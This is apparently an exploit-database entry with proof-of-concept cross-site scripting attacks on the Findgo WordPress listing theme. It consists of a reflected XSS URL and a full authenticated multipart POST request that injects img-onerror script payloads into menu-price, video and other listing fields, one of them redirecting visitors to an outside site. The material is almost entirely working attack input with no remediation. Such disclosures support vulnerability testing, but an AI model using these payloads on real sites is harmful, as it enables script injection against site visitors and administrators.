Share
## https://sploitus.com/exploit?id=WPEX-ID:10309
### PoC Unauthenticated Reflected XSS:

https://demoapus.com/findgo/listings/?search_distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E

### PoC Authenticated Persistent XSS:

[!] POST /findgo/submit-listings/ HTTP/1.1
Host: demoapus.com
Content-Type: multipart/form-data; boundary=---------------------------9002581211289785581847109542
Content-Length: 5963
Origin: https://demoapus.com
Referer: https://demoapus.com/findgo/submit-listings/
Cookie: wp-job-manager-submitting-job-id=3564; chosen_package_id=55; chosen_package_is_user_package=1; apus_preset=1525856081; hidde_popup_newsletter=1;[ other_cookies_here ]

-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_layout_type"

global
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_tagline"

poc
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_category[]"

53
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_regions"

-1
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_price_range"

notsay
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_price_from"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_price_to"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_description"

PoC
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[1][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[1][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[2][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[2][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[3][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[3][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[4][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[4][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[5][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[5][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[6][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[6][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[0][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[0][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_location"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="geo_latitude"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="geo_longitude"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_website"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_phone"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_email"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="_job_menu_prices[0][section_title]"

"><img src=x onerror=alert(document.domain);window.location=`https://twitter.com/vlad_vector`;>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="_job_menu_prices[0][title][]"

"><img src=x onerror=alert(`XSS1`)>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="_job_menu_prices[0][price][]"

"><img src=x onerror=alert(`XSS2`)>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="_job_menu_prices[0][description][]"

</textarea>"><img src=x onerror=alert(`XSS3`)>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="gallery_images[]"; filename=""
Content-Type: application/octet-stream


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_video"

"><img src=x onerror=alert(`XSS`)>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_twitter"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_facebook"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_linkedin"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_instagram"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_tags"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_manager_form"

submit-job
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_id"

0
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="step"

1
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="submit_job"

Save & Preview
-----------------------------9002581211289785581847109542--